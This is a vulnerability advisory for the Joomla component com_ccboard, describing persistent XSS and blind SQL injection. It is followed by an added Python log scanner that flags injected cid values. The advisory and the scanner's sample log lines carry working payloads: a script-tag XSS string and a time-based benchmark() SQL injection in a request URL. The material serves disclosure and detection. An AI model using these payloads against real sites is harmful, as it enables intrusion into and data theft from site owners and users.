vendor: Joomla Component com_ccboard
by: jdc
CVSS: 8,8 (HIGH)
Persistent XSS and Blind SQL Injection
CWE: 79 (Cross-site Scripting (XSS)) and 89 (SQL Injection)
Product Name: Joomla Component com_ccboard
Affected Version From: 1.2-RC
Affected Version To: 1.2-RC
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
Joomla Component com_ccboard Multiple Vulnerabilities
Persistent XSS: ccBoard doesn't filter its posts for HTML... at all: <script>prompt(1)</script>
Blind SQL injection (NOTE: must be logged in): ?option=com_ccboard&view=myprofile&cid=63 and benchmark(5000000,md5(1))
Mitigation:
Filter user input for HTML and SQL injection attacks.
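
A detection-side complement to the mitigation above, added here as an example and not part of the original advisory: it scans web access logs for com_ccboard requests whose cid parameter is not a plain integer. The log lines are constructed samples, and the rule that cid should only ever be digits is an assumption based on the cid=63 value shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory). Lines 2 and 4
# carry the cid value quoted in the advisory, URL-encoded and with raw spaces.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Nov/2010:10:00:01 +0000] "GET /index.php?option=com_ccboard&view=myprofile&cid=63 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Nov/2010:10:00:05 +0000] "GET /index.php?option=com_ccboard&view=myprofile&cid=63%20and%20benchmark(5000000,md5(1)) HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Nov/2010:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=4 HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Nov/2010:10:00:12 +0000] "GET /index.php?option=com_ccboard&view=myprofile&cid=63 and benchmark(5000000,md5(1)) HTTP/1.1" 200 5120',
]

# Non-greedy target so a request line containing raw spaces is still captured.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Assumption: a legitimate cid is a bare decimal integer.
INTEGER_RE = re.compile(r"[0-9]+")


def flag_ccboard_requests(lines):
    """Return (line_number, decoded_cid) for com_ccboard requests with a non-integer cid."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs percent-decodes values, so encoded and raw forms compare equal.
        params = parse_qs(query, keep_blank_values=True)
        if "com_ccboard" not in params.get("option", []):
            continue
        for cid in params.get("cid", []):
            if not INTEGER_RE.fullmatch(cid):
                hits.append((number, cid))
    return hits


if __name__ == "__main__":
    for number, cid in flag_ccboard_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious cid={cid!r}")
```

Access logs normally record only the query string, so a cid submitted in a POST body would need the same check applied at the application or WAF layer.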